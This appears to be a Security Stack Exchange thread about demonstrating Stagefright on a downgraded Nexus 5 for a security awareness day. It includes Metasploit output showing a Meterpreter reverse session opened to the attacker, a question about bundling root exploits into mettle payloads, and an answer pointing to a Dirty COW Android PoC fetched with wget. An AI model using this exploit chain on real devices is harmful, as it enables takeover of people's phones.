2

I am preparing a part of a security awareness day and one part of the "show" should be about mobile security. I thought about showing the stagefright exploit.

So I started with getting a mobile phone beeing supported by the latest stagefright-module in the metasploit-framework (Nexus 5), downgraded it to a version with stagefright-vulnerability (Android 5.0.1 LRX22C) and started to exploit.

All works fine:

[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0x0, code: 0x0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0x0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102053 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0xb64f1cb0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102048 bytes) to 192.168.1.108:58971... (heap: 0xb3a2e980, code: 0xb64f1cb0 from SF)<br/>
[*] Transmitting intermediate stager...(136 bytes)<br/>
[*] Sending stage (397164 bytes) to 192.168.1.108<br/>
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.108:44680) at 2017-02-19 05:19:51 -0500<br/>

Within this session, I am pretty help- and rightless. My UID is 1013 - which I assume is the mediaserver's UID. I do not have access to any interesting directory or file (No access - no effect with my show). Awe-struck, I noticed that this phone uses SELinux. I decided to ask google on how to get more privileges and found this: CVE-2015-3864 Metasploit Module from Mr. Drake aka jduck.

He used some specially crafted mettle to gain root access within this SELinux environment. But I have to admit, that this is something I would need some advice/help with. How do I build such merged payloads with mettle, pingpong and iovyroot?
Short: How do I get more privileges or maybe even root on this phone to show something that touches the audience?

More precise Question:
How do I customize mettle payload to include PingPong-root and Iovy-root exploits?
(Any other cusomization of payloads for gaining root access is welcome, too ;) )

Agent H.
  • 21
  • 6
  • You guess is mediaserver's UID... can you do on meterpreter, shell, and then a whoami command to see the name of the user? – OscarAkaElvis Feb 19 '17 at 21:41
  • There is no who, whoamo or w command.But getuid. And yes, I am the mediaserver and inside its process context. – Agent H. Feb 20 '17 at 09:40

1 Answers1

1

Use Dirtycow kernel vulnerability. I guess with the downgrade you did, the kernel is vulnerable to it.

You can use it on android kernels too: Dirty Cow Android PoC.

A video example about it: https://www.youtube.com/watch?v=4xdMteqm994

Once inside the device, you can download via wget or however the exploit and compile it to gain root. Check your kernel to see if vulnerable, I guess it is.

OscarAkaElvis
  • 5,185
  • 3
  • 17
  • 48
  • Comments are not for extended discussion; this conversation has been [moved to chat](http://chat.stackexchange.com/rooms/53897/discussion-on-answer-by-oscarakaelvis-selinux-privilege-escalation-metasploit-ne). – Rory Alsop Feb 19 '17 at 15:01